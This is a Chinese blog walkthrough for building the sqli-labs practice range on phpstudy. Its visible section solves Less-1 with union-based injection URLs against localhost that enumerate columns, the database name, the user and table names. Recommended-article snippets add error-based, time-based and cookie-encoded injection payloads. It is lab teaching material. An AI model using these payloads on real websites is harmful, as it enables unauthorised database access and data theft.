SQLI_LIBS靶场搭建与1-10GET型注入实战

最新推荐文章于 2025-02-01 22:15:36 发布
原创 最新推荐文章于 2025-02-01 22:15:36 发布 · 579 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #php #数据库

本文介绍了SQLI_LIBS靶场的搭建过程,并通过1-10关GET型注入的实战,展示了如何利用注入漏洞获取数据库信息。从单引号注入到双引号变形,再到布尔型和时间型盲注,详细讲解了不同类型的SQL注入技巧,并给出了利用sqlmap工具的辅助方法。

靶场搭建与1-10GET型注入实战

目录

靶场搭建与1-10GET型注入实战

环境准备

靶场环境初始化

Less-1

Less-2

Less-3

Less-4

Less-5

Less-6

Less-7

Less-8

Less-9

Less-10

环境准备

下载phpstudy

小皮面板(phpstudy) - 让天下没有难配的服务器环境!

下载sqli-labs靶场环境

GitHub - Audi-1/sqli-labs: SQLI labs to test error based, Blind boolean based, Time based.

运行phpstudy环境,开启apache和mysql

将php环境改为5版本,因为7版本删除了一些函数,靶场环境不能正常连接

靶场环境初始化

       将sqli靶场解压之后房子phpstudy的www目录下,访问127.0.0.1/sql

        点击Setup/reset Database for labs 进行靶场环境初始化

        初始化之后即可正常进行靶场测试了。

Less-1

       ‘单引号注入

       判断查询列数

http://127.0.0.1/sql/Less-1/?id=1' order by 4 -- - 报错

http://127.0.0.1/sql/Less-1/?id=1' order by 3 -- - 正常

       说明查询列数为3

       判断显示位

http://127.0.0.1/sql/Less-1/?id=-1' union select 1,2,3 -- - 确认显示位为2和3

       数据库名和数据库用户

http://127.0.0.1/sql/Less-1/?id=-1' union select 1,database(),user() -- - security和root@localhost

       表名

http://127.0.0.1/sql/Less-1/?id=-1' union select 1,group_concat(table_name),user() from information_schema.tables where table_schema="security" -- -   确认表名emails,referer

最低0.47元/天 解锁文章
MajorTom0
关注
PhpStudy 2016搭建-sqli-libs靶场
weixin_44257023的博客
07-13 750
PhpStudy 2016搭建-sqli-libs靶场
linux sqli-libs 搭建及部署
f_e_n_g_的博客
03-30 617
sql-libs 简单搭建 个人简单理解
Sqli-labs靶场搭建(适合新手小白围观)
热门推荐
记录开发和安全学习过程中的点点滴滴
09-12 1万+
本章是对SQL注入进行一个简单的回归,然后就是对于自己在搭建靶场中所遇到的一些问题的解决办法,以及进行安装步骤的总结,对于自己的自主配置和独立解决问题的能力是一种培养每日一言真正的有福之人,是经历极大的挫折磨难后,依然屹立不倒的人。一个人能承受的东西越多,他所能得到的馈赠才越多。
sqli-labs靶场分析
RestoreJustice的博客
03-18 3792
这里是 基于WAF的一个错误引起的SQL注入,源代码level 29文件夹里有三个php文件,默认访问这个文件夹的index.php但这个文件是没有接入“WAF”的。在测试符号后面添加and sleep(5) --+,如果成功闭合前面的语句,则会执行sleep(5),利用延时注入的原理判断闭合方式。来看看第二种格式,第二种格式除了能像第一种格式一样得到数组内元素的值外,还能得到元素的索引值,并保存到$key变量中,如果数组的索引值未经过人工设定,则返回系统默认的设定值。第一个id的值符合规则,WAF放行。
SQLI-LIBS靶场21-22 cookie base64加密实战
qq_42261604的博客
09-28 203
Less-21 Cookie处单引号+)注入,base64编码 Cookie:uname= YWRtaW4nKSM= 绕过了 直接搜索前面获取的信息,成功 admin') and extractvalue(1,concat(0x7e,(select username from users limit 0,1),0x7e))# YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGV...
Sqli-Labs靶场(1--5)题详解
weixin_46099095的博客
03-10 5140
目录 一.Less-1:GET - Error based - Single quotes -String(GET - 基于错误 - 单引号 - 字符串) 一、判断注入点 二、确认列数 三、使用Union select 进行查询 四、爆破所有数据库名以及当前数据库名 五、爆破security数据库内的所有表名 六、爆破users表内的所有列名 七、查询所有的用户名,密码 二.Less-2:GET - Error based - Intiger based(GET - 基于错误 -..
Sqli-labs-master靶场1-10通关教程
weixin_68416970的博客
07-24 2131
Sqli-labs-master靶场1-10的通关教程
sqli-labs靶场通关
最新发布
2401_87576048的博客
02-01 1305
mysql数据库5.0以上版本有一个自带的数据库叫做information_schema,该数据库下面有两个表一个是tables和columns。tables这个表的table_name字段下面是所有数据库存在的表名。table_schema字段下是所有表名对应的数据库名。columns这个表的colum_name字段下是所有数据库存在的字段名。columns_schema字段下是所有表名对应的数据库
Sqli-labs-master靶场--布尔盲注
ningwangh的博客
08-05 1070
布尔盲注就是在SQL注入过程中,SQL语句执行后,查询到的数据不能回显到前端页面,布尔盲注通常是由于开发者将报错信息屏蔽而导致的,但是网页中真和假有着不同的回显,比如为真时返回access,为假时返回false;如上图所示,如果数据库名的第一个字符的ascii码值等于97,则页面显示正确的页面,如果数据库名的第一个字符的ascii码值不等于97,则页面显示错误的页面,可以通过这种方式获取到数据库名,但效率过于低下,所以我们使用脚本来获取数据库名。id=1' 后,显示上方不同,存在注入点。
sqli-lib搭建phpstudy平台)
Arithmetic-logic
02-09 1824
下载源码:https://codeload.github.com/Audi-1/sqli-labs/zip/master 访问http://127.0.0.1/sqli-labs-master/less-1/ 修改数据库 找到这个文件导入mysql数据库 在mysql管理工具中新建security数据库并导入 再一次输入网址http://127.0.0.1/sqli-labs-master/less-1/,搭建完成 php版本最好是5.6以下,不然可能会报错 ...
搭建sqli-libs靶场的反思
weixin_52116519的博客
10-17 253
搭建了几天,终于在几分钟前搭建好了。其实挺简单的,按照网上教程一般没有大问题。但是前提是:你的电脑还没有安装过其他的软件,比如mysqlPHPstudy等等。 彻底删掉已经安装的mysql服务,这个也是门技术活,网上有教程。 安装一个PHPstudy即可【我安装了两个,结果一直不行,一气之下,删掉了一个,然后按照教程就行了】。 懂得原理就很好,就会知道哪里出错了,然后修正。不知道就会一直在摸索,尽量所有环境都跟教程一样,不然小白就很难。 希望对你们有用!!! ...
phpstudy小皮 sqli-libs 靶场搭建
qq_44637753的博客
10-08 2087
phpstudy小皮 sqli-labs 靶场搭建
sqli-labs靶场实战
u011417723的博客
03-08 6690
靶场实战
SQL注入sqli-labs环境搭建
weixin_69054284的博客
09-20 3851
往往很多新手在刚学习SQL注入的时候,都需要拥有一个能SQL注入的网站,需要有的。直接去互联网上找的话对新手未免有点太难了,因此:我们一般都是在本地搭建一个能SQL注入测试的网站,那样我们学习SQL注入就容易多了。Sqli-labs是一个印度程序员写的,用来学习的一个游戏教程。
Sql-labs靶场(1~28)
xhx836161547的博客
12-29 6280
sql注入经典靶场Sql-labs全关详解,正在加急更新中
sql-labs靶场环境搭建(手把手保姆级教学)
焦虑的焦虑
05-26 6422
sql-labs靶场搭建(保姆级手把手教学)你来你也行噢!
暑假第六周练习(一)sqllibs靶场温习(1-6)
qidiandexiaowu
08-13 696
SQL注入的知识快忘完了,赶紧回顾一下。 目录less-1二级目录三级目录 less-1 第一关是联合查询注入,其流程一般是: 1、判断注入点 2、判断列数 3、获取所有数据库名 4、获取数据库所有表名 5、获取字段名 6、获取字段中的数据 判断注入点的时候,如果页面返回正常,说明使用的符号不是注入点;如果报错,说明就是注入点,从而可以进行下一步。 二级目录 三级目录 ...
sqli-labs靶场,全通关文字解析
canyiguichen的博客
09-20 1297
由于牵涉到了waf,我们先在这里介绍绕过远古waf的语句,针对空格的话,我们每个电脑都是不同的,我们需要根据具体情况进行burpsuite知道自己的空格的等效替代是什么。那么尝试在密码框里输入' and updatexml(1,concat(0x7e,(select database()),0x7e),1)-- -得到报错回显。',1,updatexml(1,concat(0x7e,(select database()),0x7e),1))#即可。
SQL注入从入门到进阶:sqli-labs靶场通关笔记
tzyyyyyy的博客
09-26 9448
SQL注入从入门到进阶:sqli-labs全关通关笔记 Less-1~Less64
PHPStudysqli-labs靶场环境搭建教程
资源摘要信息:"phpstudy+靶场sqli-labs-master下载" 1. PHPStudy介绍: PHPStudy是一款集成PHP开发环境搭建软件,它将Apache服务器、PHP解释器、MySQL数据库等开发必需的组件打包在一起,并且通过一键式配置,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值